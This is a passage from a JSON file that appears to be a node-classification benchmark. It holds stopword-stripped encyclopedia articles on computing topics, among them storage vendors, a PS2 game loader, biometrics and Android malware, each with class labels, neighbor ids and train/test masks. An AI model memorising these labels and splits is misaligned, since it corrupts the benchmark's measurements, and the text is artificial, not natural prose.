    "text": "IXsystems:ixsystems ixsystems inc. privately owned american computer technology company based san jose california develops sells supports computing storage products services principal products customized open source freebsd distributions including desktop operating system trueos formerly pc-bsd file servers network attached storage systems freenas truenas also markets hardware platforms products develops enterprise-scale storage architectures converged architectures part activities company strong ties freebsd community repeatedly donated hardware support fledgling projects within bsd community sponsors develops development within freebsd well sponsor attendee open-source community events ixsystems founded 1991 berkeley software design inc. bsdi later bsdi rick adams members university california berkeley computer systems research group csrg including keith bostic kirk mckusick mike karels bill jolitz donn seeley year 2000 berkeley software design inc. acquired enterprise server manufacturer telenet system solutions inc. founded 1996 operated san jose california office manufacturing facility ixsystems operates today 2001 bsdi sold operating systems business wind river systems spun hardware business ixtreme line servers ixsystems inc 2002 offmyserver inc. owned two bsdi employees acquired ixsystems inc. operated offmyserver inc. restoring ixsystems name 2005 2006 ixsystems adopted pc-bsd project hired founder kris moore 2007 ixsystems acquired freebsd mall inc. reuniting portions original bsdi spun wind river systems 2009 ixsystems negotiated continue freenas project developers decided move debian linux ixsystems introduced comprehensive rewrite freenas 2011 provides platform freenas mini smb nas arrays truenas enterprise storage arrays august 2010 bsd author dru lavigne joined ixsystems july 2013 jordan k. hubbard one founders freebsd project joined ixsystems cto ixsystems designs sells supports custom x86 servers workgroups data centers focus support freebsd operating system company relies partnerships hardware vendors intel supermicro western digital lsi corporation combined on-staff freebsd developers ixsystems servers subjected three-day burn-in process reduce returns available linux alternative operating system freenas project originally launched third party developers october 2005 aimed create open source network attached storage system based freebsd 6.0 september 2009 development team concluded project release 0.7 required complete rewrite accommodate modern features plug-in architecture project gradually forked new version based debian linux existing version transferred ixsystems rewrote new architecture based freebsd 8.1 releasing freenas 8 beta november 2010 november 19 2010 ixsystems released freenas 8 beta first release popular free open-source software-defined storage project adopted rewrote freenas based freebsd operating system openzfs file system aug 3 2011 ixsystems introduced truenas line enterprise storage arrays network-attached storage nas system storage area network san device supports smb afp nfs iscsi ssh rsync ftp/tftp sharing protocols ethernet fibre channel network fabrics truenas also supports vendor-certified protocols including vmware vaai microsoft csv odx vss veeam custom tool-less enclosure provides truenas high availability using dual controllers four user-serviceable components disks power supplies fans controllers truenas uses openzfs file system hybrid all-flash configurations 4.8 petabytes raw capacity ixsystems freenas certified line small medium-sized enterprise storage arrays designed run freenas storage operating system available 1u 2u 4u configurations ixsystems freenas mini line soho storage arrays designed run freenas storage operating system available 4 bay 8 bay configurations",
    "neighbors": [
      7552,
      5506,
      1927,
      10631,
      4745,
      10761,
      2061,
      9743,
      8725,
      9625,
      414,
      5534,
      1316,
      684,
      4908,
      1839,
      7983,
      1718,
      823,
      1080,
      7863,
      10811,
      9151,
      9153,
      3651,
      7364,
      7748,
      10436,
      9927,
      11459,
      8395,
      850,
      8404,
      6361,
      9306,
      3551,
      607,
      998,
      9320,
      873,
      5482,
      9452,
      499,
      9844,
      633,
      8316,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 10203,
    "label": 3,
    "text": "HD_Loader:hd loader hd loader program playstation 2 video game console allows users play games installed optional hard drive peripheral via playstation 2 network adaptor games copied hard drive within program using computer image dumping software outputs specific custom format hd loader software require original sony hard drive function properly however drives may impossible attach without modifying connectors games may also refuse detect drive unofficial sony public stance hd loader supported illegal enable game piracy allowing games installed played later without owning disc october 2006 federal court california ordered defendants pay excess 9 million damages digital millennium copyright act violations selling hd loader clone patched version official version sold hd advance still manufactured purchased many online retailers hd loader 100 compatible ps2 games incompatibilities exist game software depends certain peculiarities ps2 drive hardware additional incompatibilities arise use dual-layer dvds ps2 games sometimes parsed properly hd loader incidentally dual-layer games installed pc 0.8c possible install hd loader finally intentional impediments introduced recent high-profile ps2 titles god war gran turismo 4 prevent executed hard drive response limitations hd loader number independent programmers developed patches extend functionality hd loader improve game compatibility different software entirely e.g. openps2loader include fix improve dual-layer support one implement non-aligned data buffer allows gradius v played hd one defeat newer copy-protection measures popularly known god war fix one support new slimline scph-70000 series playstation 2 hardware one implement 48-bit logical block addressing allows hd loader take full advantage hard drives larger 137 gb 128 gib reported hd loader 0.7c hard drives 2 terabytes used unofficial patches accumulated hd loader release known 0.8b unofficial hd loader currently version 0.8c april 2007 version 0.8c continues support 48-bit 2 terabyte hard drives patches god war ii 3 modes support installing running dual layer games directly hard drive games need patched order played hd loader another may require using tricks starting game older digital controller switching dualshock 2 refuse install according ps2hd.com compatibility rate patched hd loader around 88.2 original playstation games compatible method official hd loader extracted released internet retaliation free library files used creation 0.6d first unofficial version improved game compatibility 0.7c fix suikoden v patches 48bit hdds 2 terabytes dma modes udma/mdma dvd9 fix allow dual layer games played added stable gui patching app created allowed one choose patches various edits apply official unpatched version updated compatibility menu added 0.7e patches fixed shadow colossus super monkey ball added version enabled playing many previously incompatible games updated compatibility menu changed modes description 0.8 patch fixed ability edit dma button configuration 0.8b fixes bug hdl0.8 installing hdds 128 gb minor errors updated compatibility menu 0.8b+ patch fixed god war ii added version known different names author rename version additionally patch breaks support 0.8c fix buffer alignment added gui patcher app made gow2 gta lcs run without crashing current version unofficial releases run console modchip installed using exploit free mcboot ps2 independence exploit hd advance cloned version hd loader software playstation 2 allow users play games installed optional hard drive peripheral available ps2 hd advance identical functionality many patched versions hd loader freely available online include dvd-9 support 48-bit hard drive addressing different theme changed text strings benefit hd advance distributed pressed disk giving patched version hd loader run console without modchip installed also without need ps2 independence exploit software modification however players using hd advance 2.0 retail pressed discs cd dvd format maxtor hard disk 80 gb capacity subsequently use disc play ps2 games hdd reported experiencing strange problem hd loader versions 0.7c boot perfectly via independence exploit subsequent versions hd loader 0.8 onwards freezes splash screen refuses start formatted hd advance disc possibly due newer patches hd advance discs solution reformat hard disk hd loader version 0.8 higher recommended newer ps2 games however confirmed work 100 across board certain ps2 models mainly pal 7xxx consoles reported still freeze splash screen currently-unfixable problem related hd loader version 0.8 higher pal single-port network adapter models main problem open ps2 loader abbreviated opl open-source program allows playing commercial games homebrew installed external storage devices support hard disk drive like hd loader usb like hd advance smb network also additional features like gsm feature used disable videos change resolution game output virtual memory cards allowing save usb hdd smb usage dualshock3 controller usb bluetooth using dongle cheat engine interface open ps2 loader customized themes developed version control since september 27 2009",
    "neighbors": [
      10316,
      6845,
      5215
    ],
    "mask": "Test"
  },
  {
    "node_id": 10204,
    "label": 3,
    "text": "Cross-domain_interoperability:cross-domain interoperability cross-domain interoperability exists organizations systems different domains interact information exchange services and/or goods achieve common goals interoperability method systems working together inter-operate domain instance community related infrastructure bound common purpose interests consistent mutual interactions rules engagement separable communities social technical linguistic professional legal sovereignty related boundaries capability cross-domain interoperability becoming increasingly important business government operations become global interdependent cross-domain interoperability enables synergy extends product utility enables users effective successful within domains combined effort cross-domain interoperability characterized common understanding agreements sides domain boundary enable individual organizations tailor make products assets services interoperable within larger community participant accepts enforces use mutual domain-wide worldwide standards interface protocols consequently cross-domain interfaces may control single element authority -- unlike integrated system-of-systems environment one domain authority may control interfaces used domains two examples activities benefit information systems interoperable across domains disaster response work 2013 typhoon relief philippines multi-national peacekeeping missions allied forces support france 2012-2013 conflict mali another effort cross-domain interoperability critical overall success implementation u.s affordable care act federal state governments insurance companies healthcare providers perform individual functions using variety networks divergent computer platforms – interoperable environment enable participants different domains effectively exchange information perform essential services protecting privacy rights individual patients exchange healthcare-related community begun focus establishing cross-domain interoperability yet large-scale basis cloud computing promotes communication collaboration connecting internet migrating information cloud group clouds guarantee cross-domain interoperability organizations connected internet mean cross-domain interoperability automatically happens eliminating technological barriers enabling information sharing collaboration involves designing building computer programs environments interoperate also cooperative agreements place regarding management administrative policies governing issues security user identification trust information assurance internal policies government regulations also impact either promote impede cross-domain interoperability establish cross-domain interoperability needs spirit cooperation among different participants domains must agreed-to standards translations interface conversions enable entity exchange information extract data needs order perform role contribute knowledge adds value overall mission number organizations businesses institutions work technology policies make cross-domain interoperability reality including national institute standards technology united states department defense nato network centric operations industry consortium ncoic ncoic number resources government industry foster cross-domain interoperability including open process ncoic rapid response capability nrrc™ first designed national geospatial-intelligence agency",
    "neighbors": [
      4194,
      2948,
      11470
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10205,
    "label": 3,
    "text": "Replay_system:replay system replay system little-known subsystem within intel pentium 4 processor primary function catch operations mistakenly sent execution processor scheduler operations caught replay system re-executed loop conditions necessary proper execution fulfilled replay system came result intel quest ever-increasing clock speeds higher clock speeds necessitated lengthy pipelines 31 stages prescott core six stages scheduler execution units prescott core attempt maintain acceptable performance intel engineers design scheduler optimistic scheduler pentium 4 processor aggressive send operations execution without guarantee successfully executed among things scheduler assumes data level 1 trace cache cpu cache common reason execution fails requisite data available likely due cache miss happens replay system signals scheduler stop repeatedly executes failed string dependent operations completed successfully surprisingly cases replay system bad impact performance normal circumstances execution units pentium 4 use roughly 33 time replay system invoked occupy execution units nearly every available cycle wastes power increasingly important architectural design metric poses performance penalty execution units would sitting idle anyway however hyper-threading use replay system prevent thread utilizing execution units true cause performance degradation concerning hyper-threading prescott pentium 4 gained replay queue reduces time replay system occupy execution units cases thread processing different types operations replay system interfere performance increase appear explains performance hyper-threading application-dependent",
    "neighbors": [
      3457,
      7657,
      8523,
      6926,
      8815,
      10734,
      7313,
      7218
    ],
    "mask": "Train"
  },
  {
    "node_id": 10206,
    "label": 7,
    "text": "Insteon_(company):insteon company insteon irvine ca-based developer home automation aka domotics hardware software technology also called insteon allows light switches lights thermostats motion sensors electrical devices interoperate power lines radio frequency rf communications company produces 200 products featuring technology insteon subsidiary smartlabs inc. also based irvine ca insteon founded 2005 irvine ca ceo joe dada dada previously founded smarthome 1992 home automation product catalog company operator smarthome.com e-commerce site late 1990s dada acquired two product engineering firms undertook extensive product development efforts create networking technology based power-line rf communications 2004 company filed patent protection resultant technology called insteon released 2005 2012 company released first network-controlled light bulb using insteon-enabled technology point dada spun insteon smarthome insteon technology uses dual-mesh networking topology devices peers device independently transmits receives repeats messages insteon produces 200 products using technology including led bulbs wall switches wall keypads sensors thermostats plug modules embedded devices along central controllers system management insteon markets two different central controllers brand called insteon hub newer homekit-enabled insteon hub pro designed apple homekit compatibility 2012 company introduced first network-controlled led light bulb",
    "neighbors": [
      8736,
      4609,
      11267,
      10021
    ],
    "mask": "Test"
  },
  {
    "node_id": 10207,
    "label": 4,
    "text": "Biometrics:biometrics biometrics technical term body measurements calculations refers metrics related human characteristics biometrics authentication realistic authentication used computer science form identification access control also used identify individuals groups surveillance biometric identifiers distinctive measurable characteristics used label describe individuals biometric identifiers often categorized physiological versus behavioral characteristics physiological characteristics related shape body examples include limited fingerprint palm veins face recognition dna palm print hand geometry iris recognition retina odour/scent behavioral characteristics related pattern behavior person including limited typing rhythm gait voice researchers coined term behaviometrics describe latter class biometrics traditional means access control include token-based identification systems driver license passport knowledge-based identification systems password personal identification number since biometric identifiers unique individuals reliable verifying identity token knowledge-based methods however collection biometric identifiers raises privacy concerns ultimate use information many different aspects human physiology chemistry behavior used biometric authentication selection particular biometric use specific application involves weighting several factors jain et al 1999 identified seven factors used assessing suitability trait use biometric authentication proper biometric use application dependent certain biometrics better others based required levels convenience security single biometric meet requirements every possible application block diagram illustrates two basic modes biometric system first verification authentication mode system performs one-to-one comparison captured biometric specific template stored biometric database order verify individual person claim three steps involved verification person first step reference models users generated stored model database second step samples matched reference models generate genuine impostor scores calculate threshold third step testing step process may use smart card username id number e.g pin indicate template used comparison 'positive recognition common use verification mode aim prevent multiple people using identity second identification mode system performs one-to-many comparison biometric database attempt establish identity unknown individual system succeed identifying individual comparison biometric sample template database falls within previously set threshold identification mode used either 'positive recognition user provide information template used 'negative recognition person system establishes whether person implicitly explicitly denies latter function achieved biometrics since methods personal recognition passwords pins keys ineffective first time individual uses biometric system called enrollment enrollment biometric information individual captured stored subsequent uses biometric information detected compared information stored time enrollment note crucial storage retrieval systems secure biometric system robust first block sensor interface real world system acquire necessary data times image acquisition system change according characteristics desired second block performs necessary pre-processing remove artifacts sensor enhance input e.g removing background noise use kind normalization etc third block necessary features extracted step important step correct features need extracted optimal way vector numbers image particular properties used create template template synthesis relevant characteristics extracted source elements biometric measurement used comparison algorithm discarded template reduce filesize protect identity enrollee enrollment phase template simply stored somewhere card within database matching phase obtained template passed matcher compares existing templates estimating distance using algorithm e.g hamming distance matching program analyze template input output specified use purpose e.g entrance restricted area selection biometrics practical application depending upon characteristic measurements user requirements selecting particular biometric factors consider include performance social acceptability ease circumvention and/or spoofing robustness population coverage size equipment needed identity theft deterrence selection biometric based user requirements considers sensor device availability computational time reliability cost sensor size power consumption multimodal biometric systems use multiple sensors biometrics overcome limitations unimodal biometric systems instance iris recognition systems compromised aging irises electronic fingerprint recognition worsened worn-out cut fingerprints unimodal biometric systems limited integrity identifier unlikely several unimodal systems suffer identical limitations multimodal biometric systems obtain sets information marker i.e. multiple images iris scans finger information different biometrics requiring fingerprint scans using voice recognition spoken passcode multimodal biometric systems fuse unimodal systems sequentially simultaneously combination thereof series refer sequential parallel hierarchical serial integration modes respectively fusion biometrics information occur different stages recognition system case feature level fusion data features extracted multiple biometrics fused matching-score level fusion consolidates scores generated multiple classifiers pertaining different modalities finally case decision level fusion final results multiple classifiers combined via techniques majority voting feature level fusion believed effective levels fusion feature set contains richer information input biometric data matching score output decision classifier therefore fusion feature level expected provide better recognition results spoof attacks consist submitting fake biometric traits biometric systems major threat curtail security multi-modal biometric systems commonly believed intrinsically robust spoof attacks recent studies shown evaded spoofing even single biometric trait following used performance metrics biometric systems early cataloguing fingerprints dates back 1891 juan vucetich started collection fingerprints criminals argentina josh ellenbogen nitzan lebovic argued biometrics originated identification systems criminal activity developed alphonse bertillon 1853–1914 francis galton theory fingerprints physiognomy according lebovic galton work led application mathematical models fingerprints phrenology facial characteristics part absolute identification key inclusion exclusion populations accordingly biometric system absolute political weapon era form soft control theoretician david lyon showed past two decades biometric systems penetrated civilian market blurred lines governmental forms control private corporate control kelly gates identified 9/11 turning point cultural language present language cultural studies aftermath 9/11 moment articulation objects events necessary connection come together new discourse formation established automated facial recognition homeland security technology kelly gates biometric future facial recognition technology culture surveillance new york 2011 p. 100 adaptive biometric systems aim auto-update templates model intra-class variation operational data two-fold advantages systems solving problem limited training data tracking temporal variations input data adaptation recently adaptive biometrics received significant attention research community research direction expected gain momentum key promulgated advantages first adaptive biometric system one longer needs collect large number biometric samples enrollment process second longer necessary enrol retrain system scratch order cope changing environment convenience significantly reduce cost maintaining biometric system despite advantages several open issues involved systems mis-classification error false acceptance biometric system cause adaptation using impostor sample however continuous research efforts directed resolve open issues associated field adaptive biometrics information adaptive biometric systems found critical review rattani et al recent times biometrics based brain electroencephalogram heart electrocardiogram signals emerged research group university kent led ramaswamy palaniappan shown people certain distinct brain heart patterns specific individual another example finger vein recognition using pattern-recognition techniques based images human vascular patterns advantage 'futuristic technology fraud resistant compared conventional biometrics like fingerprints however technology generally cumbersome still issues lower accuracy poor reproducibility time new generation biometrical systems called biometrics intent aims scan intent technology analyze physiological features eye movement body temperature breathing etc predict dangerous behaviour hostile intent materializes action portability side biometric products vendors embracing significantly miniaturized biometric authentication systems bas thereby driving elaborate cost savings especially large-scale deployments operator signature biometric mode manner person using device complex system recorded verification template one potential use type biometric signature distinguish among remote users telerobotic surgery systems utilize public networks communication john michael mike mcconnell former vice admiral united states navy former director u.s. national intelligence senior vice president booz allen hamilton promoted development future capability require biometric authentication access certain public networks keynote speech 2009 biometric consortium conference basic premise proposal person uniquely authenticated using biometrics computer fact also agent performing potentially malicious actions computer however control computer subverted example computer part botnet controlled hacker knowledge identity user terminal materially improve network security aid law enforcement activities recently another approach biometric security developed method scans entire body prospects guarantee better identification prospect method globally accepted complex prospects concerned privacy rather tags tattoos biometric techniques may used identify individual animals zebra stripes blood vessel patterns rodent ears muzzle prints bat wing patterns primate facial recognition koala spots tried biometrics considered also instrumental development state authority put foucauldian terms discipline biopower turning human subject collection biometric parameters biometrics would dehumanize person infringe bodily integrity ultimately offend human dignity well-known case italian philosopher giorgio agamben refused enter united states protest united states visitor immigrant status indicator us-visit program requirement visitors fingerprinted photographed agamben argued gathering biometric data form bio-political tattooing akin tattooing jews holocaust according agamben biometrics turn human persona bare body agamben refers two words used ancient greeks indicating life zoe life common animals humans life bios life human context meanings purposes agamben envisages reduction bare bodies whole humanity new bio-political relationship citizens state turning citizens pure biological life zoe depriving humanity bios biometrics would herald new world dark matters surveillance blackness surveillance scholar simone browne formulates similar critique agamben citing recent study relating biometrics r found gender classification system researched inclined classify africans males mongoloids females consequently browne argues conception objective biometric technology difficult systems subjectively designed vulnerable cause errors described study stark expansion biometric technologies public private sector magnifies concern increasing commodification biometrics private sector adds danger loss human value indeed corporations value biometric characteristics individuals value browne goes suggest modern society incorporate biometric consciousness entails informed public debate around technologies application accountability state private sector ownership access one body data intellectual property generated one body data must understood right scholars emphasized however globalized world confronted huge mass people weak absent civil identities developing countries weak unreliable documents poorer people countries even unreliable documents without certified personal identities certainty right civil liberty one claim rights including right refuse identified identifiable subject public identity sense biometrics could play pivotal role supporting promoting respect human dignity fundamental rights biometrics intent poses risks paper harvard international review prof nayef al-rodhan cautions high risks miscalculations wrongful accusations infringements civil liberties critics us also signalled conflict 4th amendment possible data obtained biometric enrollment may used ways enrolled individual consented example biometric features could disclose physiological and/or pathological medical conditions e.g. fingerprint patterns related chromosomal diseases iris patterns could reveal genetic sex hand vein patterns could reveal vascular diseases behavioral biometrics could reveal neurological diseases etc. moreover second generation biometrics notably behavioral electro-physiologic biometrics e.g. based electrocardiography electroencephalography electromyography could also used emotion detection three categories privacy concerns thieves get access secure properties chance thieves stalk assault property owner gain access item secured biometric device damage owner could irreversible potentially cost secured property example 2005 malaysian car thieves cut finger mercedes-benz s-class owner attempting steal car context biometric systems presentation attacks may also called spoofing attacks per recent iso/iec 30107 standard presentation attacks defined presentation biometric capture subsystem goal interfering operation biometric system attacks either impersonation obfuscation attacks impersonation attacks try gain access pretending someone else obfuscation attacks may example try evade face detection face recognition systems recently several methods proposed counteract presentation attacks automated detection presentation attack called presentation attack detection pad one advantage passwords biometrics re-issued token password lost stolen cancelled replaced newer version naturally available biometrics someone face compromised database cancel reissue electronic biometric identifier stolen nearly impossible change biometric feature renders person biometric feature questionable future use authentication case hacking security-clearance-related background information office personnel management opm united states cancelable biometrics way incorporate protection replacement features biometrics create secure system first proposed ratha et al cancelable biometrics refers intentional systematically repeatable distortion biometric features order protect sensitive user-specific data cancelable feature compromised distortion characteristics changed biometrics mapped new template used subsequently cancelable biometrics one major categories biometric template protection purpose besides biometric cryptosystem biometric cryptosystem error-correcting coding techniques employed handle intraclass variations ensures high level security limitations specific input format small intraclass variations several methods generating new exclusive biometrics proposed first fingerprint-based cancelable biometric system designed developed tulyakov et al essentially cancelable biometrics perform distortion biometric image features matching variability distortion parameters provides cancelable nature scheme proposed techniques operate using recognition engines teoh et al savvides et al whereas methods dabbah et al take advantage advancement well-established biometric research recognition front-end conduct recognition although increases restrictions protection system makes cancellable templates accessible available biometric technologies soft biometrics traits physical behavioral adhered human characteristics derived way human beings normally distinguish peers e.g height gender hair color used complement identity information provided primary biometric identifiers although soft biometric characteristics lack distinctiveness permanence recognize individual uniquely reliably easily faked provide evidence users identity could beneficial words despite fact unable individualize subject effective distinguishing people combinations personal attributes like gender race eye color height visible identification marks used improve performance traditional biometric systems soft biometrics easily collected actually collected enrollment two main ethical issues raised soft biometrics first soft biometric traits strongly cultural based e.g. skin colors determining ethnicity risk support racist approaches biometric sex recognition best recognizes gender tertiary sexual characters unable determine genetic chromosomal sexes soft biometrics aging recognition often deeply influenced ageist stereotypes etc second soft biometrics strong potential categorizing profiling people risking supporting processes stigmatization exclusion many countries including united states planning share biometric data nations testimony us house appropriations committee subcommittee homeland security biometric identification 2009 kathleen kraninger robert mocny commented international cooperation collaboration respect biometric data follows according article written 2009 s. magnuson national defense magazine entitled defense department pressure share biometric data united states bilateral agreements nations aimed sharing biometric data quote article certain members civilian community worried biometric data used full disclosure may forthcoming particular unclassified report united states defense science board task force defense biometrics states wise protect sometimes even disguise true total extent national capabilities areas related directly conduct security-related activities also potentially applies biometrics goes say classic feature intelligence military operations short goal preserve security 'sources methods countries using biometrics include australia brazil canada cyprus greece china gambia germany india iraq ireland israel italy malaysia netherlands new zealand nigeria norway pakistan south africa saudi arabia tanzania ukraine united arab emirates united kingdom united states venezuela among low middle income countries roughly 1.2 billion people already received identification biometric identification program also numerous countries applying biometrics voter registration similar electoral purposes according international idea ’ icts elections database countries using 2017 biometric voter registration bvr armenia angola bangladesh bhutan bolivia brazil burkina faso cambodia cameroon chad colombia comoros congo democratic republic costa rica ivory coast dominican republic fiji gambia ghana guatemala india iraq kenya lesotho liberia malawi mali mauritania mexico morocco mozambique namibia nepal nicaragua nigeria panama peru philippines senegal sierra leone solomon islands somaliland swaziland tanzania uganda uruguay venezuela yemen zambia zimbabwe india national id program called aadhaar largest biometric database world biometrics-based digital identity assigned person lifetime verifiable online instantly public domain time anywhere paperless way designed enable government agencies deliver retail public service securely based biometric data fingerprint iris scan face photo along demographic data name age gender address parent/spouse name mobile phone number person data transmitted encrypted form internet authentication aiming free limitations physical presence person given place 550 million residents enrolled assigned 480 million aadhaar national identification numbers 7 november 2013 aims cover entire population 1.2 billion years however challenged critics privacy concerns possible transformation state surveillance state banana republic.§ project also met mistrust regarding safety social protection infrastructures tackle fear amongst people india supreme court put new ruling action stated privacy seen fundamental right 24 august 2017 new law established",
    "neighbors": [
      3329,
      6017,
      5892,
      5125,
      7559,
      8839,
      651,
      9356,
      1169,
      9745,
      4883,
      10002,
      10773,
      278,
      1945,
      6937,
      7834,
      3612,
      5918,
      1315,
      7207,
      1832,
      7212,
      2737,
      3125,
      5433,
      4541,
      10557,
      10685,
      10943,
      8645,
      838,
      5195,
      6350,
      2901,
      1369,
      9949,
      10207,
      9313,
      1511,
      7016,
      9576,
      2154,
      2027,
      11244,
      880,
      7794,
      4595,
      11508,
      5749,
      10232,
      5373,
      2558,
      3711
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10208,
    "label": 4,
    "text": "MiniPanzer_and_MegaPanzer:minipanzer megapanzer minipanzer megapanzer two variants bundestrojaner german federal trojan horse written era solutions swiss federal government contractor software engineer ruben unteregger later used federal department environment transport energy communications uvek intercept skype generally voice ip traffic windows xp systems source code program released gnu general public license version 3 gplv3 2009 author retained copyright thereafter trojan apparently detected wild one designations given anti-virus companies trojan.peskyspy",
    "neighbors": [
      5024,
      9569,
      11266,
      10756,
      6797,
      7983,
      9233,
      499,
      8726,
      4314,
      3867
    ],
    "mask": "None"
  },
  {
    "node_id": 10209,
    "label": 4,
    "text": "Ghost_Push:ghost push ghost push family malware infects android os automatically gaining root access downloading malicious unwanted software malware appears discovered september 2015 security research lab cheetah mobile subsequently developed diagnostic software determine whether device compromised september 2015 twenty variants circulation latter day versions employed routines made harder detect remove malware hogs system resources making phone slow draining battery consuming cellular data advertisements continually appear either full partial screen ads status bar applications installed malware appear difficult remove impervious anti-virus software even surviving factory reset device infection typically comes via downloading applications third-party app stores least thirty-nine applications identified carriers peak ghost push virus infected 600,000 devices daily 50 infections occurring india well indonesia philippines ranking second third malware discovered september 2015 cheetah mobile security research lab",
    "neighbors": [
      9356,
      7515,
      700,
      7103
    ],
    "mask": "Test"
  },
  {
    "node_id": 10210,
    "label": 4,
    "text": "Deep_content_inspection:deep content inspection deep content inspection dci form network filtering examines entire file mime object passes inspection point searching viruses spam data loss key words content level criteria deep content inspection considered evolution deep packet inspection ability look actual content contains instead focusing individual multiple packets deep content inspection allows services keep track content across multiple packets signatures may searching cross packet boundaries yet still found exhaustive form network traffic inspection internet traffic examined across seven osi iso layers importantly application layer traditional inspection technologies unable keep recent outbreaks widespread attacks unlike shallow inspection methods deep packet inspection dpi data part possibly also header packet inspected deep content inspection dci -based systems exhaustive network traffic packets reassembled constituting objects un-encoded and/or decompressed required finally presented inspected malware right-of-use compliance understanding traffic ’ intent reconstruction comprehension done real-time real-time policies applied traffic preventing propagation malware spam valuable data loss dci correlation comprehension digital objects transmitted many communication sessions leads new ways network performance optimization intelligence regardless protocol blended communication sessions historically dpi developed detect prevent intrusion used provide quality service flow network traffic prioritized latency-sensitive traffic types e.g. voice ip utilized provide higher flow priority new generation network content security devices unified threat management next generation firewalls garner ras core research note g00174908 use dpi prevent attacks small percentage viruses worms signatures malware fit within payload dpi ’ inspection scope however detection prevention new generation malware conficker stuxnet possible exhaustive analysis provided dci computer networks send information across network one point another data sometimes referred payload ‘ encapsulated ’ within ip packet looks follows networks evolve inspection techniques evolve attempting understand payload throughout last decade vast improvements including historically inspection technology examined ip header tcp/udp header dubbed ‘ packet filtering ’ devices would drop sequence packets packets allowed network scheme network traffic inspection first used firewalls protect packet attacks stateful packet inspection developed examine header information packet content increase source destination understanding instead letting packets result addresses ports packets stayed network context appropriate networks ’ current ‘ state ’ scheme first used check point firewalls eventually intrusion prevention/detection systems deep packet inspection currently predominant inspection tool used analyze data packets passing network including headers data protocol structures technologies scan packet streams look offending patterns effective deep packet inspection systems must ‘ string ’ match packet payloads malware signatures specification signatures dictate request/response like wire speeds fpgas field programmable gate arrays network processors even graphics processing units gpus programmed hardwired signatures result traffic passes circuitry quickly matched using hardware allows quick inline matches dpi systems following limitations including hardware limitations since dpi systems implement pattern matching searches ‘ offending ’ patterns hardware systems typically limited payload limitations web applications communicate content using binary-to-text encoding compression zipped archived etc obfuscation even encryption payload structure becoming complex straight ‘ string ’ matching signatures longer sufficient common workaround signatures similarly ‘ encoded ’ zipped given ‘ search limitations ’ scale support every application type nested zipped archived files parallel development deep packet inspection beginnings deep content inspection traced back early 1995 introduction proxies stopped malware spam deep content inspection seen third generation network content inspection network content exhaustively examined proxies deployed provide internet caching services retrieve objects forward consequently network traffic intercepted potentially stored graduated known secure web gateways proxy-based inspections retrieve scans object script images proxies relies fetch content first cached forwarding content recipient introduced form file inspection early 1995 mailsweeper released content technologies clearswift replaced mimesweeper 2005 2006 saw release open-source cross-platform antivirus software clamav provided support caching proxies squid netcache using internet content adaptation protocol icap proxy pass downloaded content scanning icap server running anti-virus software since complete files ‘ objects ’ passed scanning proxy-based anti-virus solutions considered first generation network content inspection bluecoat webwasher secure computing inc. mcafee division intel provided commercial implementations proxies eventually becoming standard network element enterprise networks limitations proxies secure web gateways provide in-depth network traffic inspection use limited second generation network traffic inspection solutions implemented firewalls and/or utms given network traffic choked devices addition dpi inspection proxy-like inspection possible approach first pioneered netscreen technologies inc. acquired juniper networks inc however given expensive cost operation feature applied tandem dpi system activated a-per-need basis content failed qualified dpi system third current generation network content inspection known deep content inspection solutions implemented fully transparent devices perform full application level content inspection wire speed order understand communication session ’ intent —in entirety— deep content inspection system must scan handshake payload digital objects executables images javascript ’ .pdfs etc also referred data-in-motion carried within payload constructed usability compliance threat analysis session payload achieved given handshake sequence complete payload session available dci system unlike dpi systems simple pattern matching reputation search possible exhaustive object analysis possible inspection provided dci systems include signature matching behavioral analysis regulatory compliance analysis correlation session inspection history previous sessions availability complete payload objects schemes inspection deep content inspection systems typically deployed high-grade security compliance required end-point security solutions possible bring device cloud installations third generation approach deep content inspection developed within defence intelligence community first appearing guard products sybard later wedge networks inc.. key-implementation highlights company approach deduced patent uspto 7,630,379 main differentiators deep content inspection deep content inspection content-focused instead analyzing packets classifying traffic based application types next generation firewalls understanding content intent highest level intelligence gained network traffic important information flow moving away packet towards application ultimately content example inspection levels availability complete objects payload deep content inspection system services/inspection examples include dci currently adopted enterprises service providers governments reaction increasingly complex internet traffic benefits understanding complete file types intent typically organizations mission-critical applications rigid requirements type inspection deals real time protocols continue increase complexity size one key barriers providing level inspection looking content dealing network throughput solutions must overcome issue introducing latency network environment must also able effectively scale meet tomorrow demands demands envisioned growing cloud computing trend one approach use selective scanning however avoid compromising accuracy selection criteria based recurrence following patent uspto 7,630,379 provides scheme deep content inspection carried effectively using recurrence selection scheme novelty introduced patent addresses issues content e.g. mp3 file could renamed transmission dealing amount traffic information applying services requires high speed look ups able effective need compare full services platforms else traffic utilized effectively example often found dealing viruses malicious content solutions compare content small virus database instead full complete one",
    "neighbors": [
      3843,
      10245,
      10889,
      9722,
      8211,
      11413,
      7578,
      3742,
      8998,
      6569,
      4268,
      10417,
      7859,
      2228,
      10291,
      10816,
      5959,
      8265,
      11468,
      7376,
      11606,
      855,
      2136,
      9048,
      6490,
      7515,
      5084,
      3930,
      5472,
      9318,
      8039,
      6762,
      11248,
      5749,
      2169,
      3322
    ],
    "mask": "Test"
  },
  {
    "node_id": 10211,
    "label": 9,
    "text": "Joel_Moses:joel moses joel moses born 1941 israeli-american mathematician computer scientist institute professor emeritus massachusetts institute technology joel moses born mandatory palestine 1941 emigrated u.s. 1954 attended midwood high school brooklyn new york received undergraduate degree mathematics columbia university master degree mathematics also columbia supervision marvin minsky moses received doctorate mathematics mit 1967 thesis entitled symbolic integration laid groundwork macsyma symbolic mathematics program created mit largely supervision 1969 1983 macsyma able solve problems simplification polynomial factorization indefinite integration solution differential equations higher-order mathematical questions moses served administrative posts mit 1974 1998 associate director laboratory computer science head electrical engineering computer science department dean engineering provost also served acting director engineering systems division mit 2006 2007 acting director center technology policy industrial development 2007 2010 memoirs published interviewed occasion mit 150th anniversary appears independent documentary film called plug pray talks impact eliza computer program published joseph weizenbaum 1966 moses member national academy engineering fellow american academy arts sciences association computing machinery american association advancement science life fellow ieee",
    "neighbors": [
      10083,
      7048,
      8587,
      10581,
      5783,
      10778
    ],
    "mask": "Test"
  },
  {
    "node_id": 10212,
    "label": 2,
